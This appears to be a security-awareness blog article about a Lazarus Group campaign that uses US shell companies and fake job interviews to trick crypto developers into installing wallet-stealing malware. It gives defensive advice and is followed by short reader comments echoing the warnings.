On April 24, 2025, cybersecurity firm Silent Push published a report that should alarm every developer working in the cryptocurrency space. North Korean hackers linked to the infamous Lazarus Group created legitimate-appearing shell companies in the United States to trick crypto developers into installing malware through fake job interviews. The FBI seized one of the domains, but the threat persists. With Bitcoin trading at $93,943 and the crypto market exceeding $3 trillion in total capitalization, the incentives for state-sponsored attackers have never been greater.
The Threat Landscape
The Silent Push report details how the Lazarus subgroup known as Contagious Interview established three shell companies: Blocknovas LLC, registered in New Mexico; Softglide LLC; and Angeloper Agency. These were not hastily assembled fronts. The companies used AI-generated headshots for fake employees, posted convincing job listings on GitHub and freelance platforms, and maintained professional-looking websites. The operation has been active since 2024 and has claimed multiple confirmed victims, including a developer whose MetaMask wallet was compromised.
This campaign is part of a broader pattern. The same Lazarus subgroup is connected to the $1.4 billion theft from Bybit earlier in 2025, making it one of the most prolific and dangerous cybercriminal operations targeting the cryptocurrency industry. The FBI has labeled North Korean cyber operations as among the most advanced persistent threats facing the United States. In March 2025, at least three crypto founders reported being lured into fake Zoom calls where attackers staged audio failures and pushed malicious software disguised as audio patches.
Core Principles
Defending against these threats starts with understanding the attack chain. The Contagious Interview campaign follows a consistent pattern: the attacker posts an attractive job listing, requests an introduction video from the applicant, and then triggers a fake error message during a simulated work task. The victim is instructed to copy and paste a supposed fix, which actually installs malware such as BeaverTail, InvisibleFerret, or OtterCookie. These tools steal cryptocurrency wallet keys, harvest clipboard data, and establish persistent access to the victim’s machine.
The first core principle is skepticism. Any unsolicited job offer or recruitment message, especially those arriving via Telegram, Discord, or email, should be treated as potentially hostile until verified independently. The second principle is isolation. Never install software or run commands on a machine that contains your cryptocurrency wallets or has access to sensitive accounts. The third principle is verification. Cross-reference company names against official business registries, check LinkedIn profiles for inconsistencies, and verify that the recruiting company actually exists before engaging.
Tooling & Setup
Developers working in the cryptocurrency space should implement several layers of protection. Use a dedicated machine or virtual machine for all job-related activities, separate from the machine used for crypto transactions and wallet management. Install endpoint detection and response software that can identify known Lazarus Group malware signatures. Use hardware wallets for all significant crypto holdings, and never connect a hardware wallet to a machine that has been used for untrusted software installations.
Browser extensions that block clipboard modifications can prevent clipboard-hijacking malware like OtterCookie from substituting cryptocurrency addresses during copy-paste operations. Email and messaging platforms should be configured with strict filtering rules that flag messages from unverified senders containing links or attachments. Developers should also enable multi-factor authentication on all exchange accounts and wallet services, using a hardware security key rather than SMS-based authentication which is vulnerable to SIM-swapping attacks.
Ongoing Vigilance
The Blocknovas domain was seized by the FBI on April 24, but Softglide and other infrastructure remain operational. This means the threat is ongoing and evolving. North Korean operators are known to quickly spin up new front companies when old ones are exposed. Developers should subscribe to threat intelligence feeds from organizations like Silent Push, Mandiant, and the FBI’s IC3 alerts to stay informed about newly identified front companies and attack patterns.
Community vigilance matters as well. When the Blocknovas deception was first reported on April 24, security researcher Zach Edwards shared the findings publicly, enabling rapid awareness across the crypto development community. Sharing information about suspicious recruitment approaches, unusual interview processes, and potential malware encounters helps protect the entire ecosystem.
Final Takeaway
The convergence of state-sponsored cybercrime and cryptocurrency has created an environment where individual developers are on the front lines of a geopolitical conflict. The Lazarus Group’s fake company scheme demonstrates that attackers are investing significant resources into creating convincing cover stories. The best defense is a combination of technical safeguards, operational discipline, and a healthy dose of skepticism. If a job opportunity seems too good to be true, it probably is. Verify everything, isolate your crypto operations, and never run untrusted code on a machine that has access to your digital assets.
Disclaimer: This article is for informational purposes only and does not constitute financial or investment advice. Always conduct your own research before making any financial decisions.
This playbook is essential for anyone applying to Web3 roles today. I’ve seen several cases where ‘recruiters’ send over a GitHub repo that contains malicious packages hidden in the dependencies. Always audit what you’re being asked to run, especially if it’s a proprietary testing environment. Stay safe out there folks!
blocknovas LLC registered in new mexico of all places. AI headshots and fake github repos. the lazarus group upgrades their opsec every cycle
blocknovas and softglide LLCs registered in the US with AI headshots. lazarus has moved from phishing emails to full corporate impersonation. scary escalation
blocknovas llc and softglide llc with ai headshots targeting devs via fake interviews is next level lazarus
AI headshots are getting indistinguishable from real ones. reverse image search used to catch fakes but now AI generates unique faces
It’s wild that we even have to worry about state-sponsored actors in the job hunt, but that’s the reality of the industry now. I appreciate the tip about verifying the recruiter’s identity through multiple channels. If a deal looks too good to be true and they’re rushing the technical part, it’s probably a trap.
a metamask wallet compromised through a fake technical interview. thats terrifying for anyone in web3 actively job hunting right now
metamask compromise through a fake interview process is exactly why I use a separate wallet for any dev work. never connect your main to anything a recruiter sends you
metamask compromise straight from the fake interview process is the new lazarus playbook
separate wallet for dev work should be standard practice. i have three tiers: main vault, active trading, and disposable for testing
lazarus been running fake recruiter campaigns since at least 2020. the shell companies are new though, way more sophisticated